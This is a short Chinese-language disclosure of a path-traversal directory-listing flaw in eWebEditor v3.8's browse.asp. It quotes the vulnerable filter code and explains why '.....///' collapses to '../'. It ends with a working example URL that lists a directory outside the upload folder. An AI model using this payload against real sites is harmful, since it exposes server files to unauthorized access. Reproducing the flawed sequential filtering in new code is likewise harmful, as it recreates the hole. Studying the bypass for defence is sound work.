标题:asp eWebEditor v3.8 列目录漏洞(其他版本为测试)
漏洞文件:asp/browse.asp
漏洞产生:
Sub InitParam() sType = UCase(Trim(Request.QueryString("type"))) sStyleName = Trim(Request.QueryString("style")) sCusDir = Trim(Request.QueryString("cusdir")) Dim i, aStyleConfig, bValidStyle bValidStyle = False For i = 1 To Ubound(aStyle) aStyleConfig = Split(aStyle(i), "|||") If Lcase(sStyleName) = Lcase(aStyleConfig(0)) Then bValidStyle = True Exit For End If Next If bValidStyle = False Then OutScript("alert('Invalid Style.')") End If sBaseUrl = aStyleConfig(19) nAllowBrowse = CLng(aStyleConfig(43)) nCusDirFlag = Clng(aStyleConfig(61)) If nAllowBrowse <> 1 Then OutScript("alert('Do not allow browse!')") End If If nCusDirFlag <> 1 Then sCusDir = "" Else sCusDir = Replace(sCusDir, "", "/") If Left(sCusDir, 1) = "/" Or Left(sCusDir, 1) = "." Or Right(sCusDir, 1) = "." Or InStr(sCusDir, "./") > 0 Or InStr(sCusDir, "/.") > 0 Or InStr(sCusDir, "//") > 0 Then sCusDir = "" Else If Right(sCusDir, 1) <> "/" Then sCusDir = sCusDir & "/" End If End If End If sUploadDir = aStyleConfig(3) If Left(sUploadDir, 1) <> "/" Then sUploadDir = "../" & sUploadDir End If Select Case sBaseUrl Case "0" sContentPath = aStyleConfig(23) Case "1" sContentPath = RelativePath2RootPath(sUploadDir) Case "2" sContentPath = RootPath2DomainPath(RelativePath2RootPath(sUploadDir)) End Select sUploadDir = sUploadDir & sCusDir sContentPath = sContentPath & sCusDir Select Case sType Case "FILE" sAllowExt = "" Case "MEDIA" sAllowExt = "rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov" Case "FLASH" sAllowExt = "swf" Case Else sAllowExt = "bmp|jpg|jpeg|png|gif" End Select sCurrDir = sUploadDir sDir = Trim(Request("dir")) '1.假设dir= ../ '2.假设dir=...// '3.假设dir=...../// sDir = Replace(sDir, "", "/") '过滤1 sDir = Replace(sDir, "../", "") '过滤2 '1.到这里就被过滤了 sDir = Replace(sDir, "./", "") '过滤3 '2到这里也被功率了 '3到这里就成../了。比较有趣的饶过!好象不少cms这样过滤过。[/color] If sDir <> "" Then If CheckValidDir(Server.Mappath(sUploadDir & sDir)) = True Then sCurrDir = sUploadDir & sDir & "/" Else sDir = "" End If End If End Sub
漏洞发生者:鬼哥
攻击代码示例:
http://localhost/asp/browse.asp?action=file&type=file&dir=.....///DiaLog&style=full650&cusdir=&foldertype=upload&returnflag=span_upload
跳转到上eWebEditor的DiaLog目录
@草哲 🙂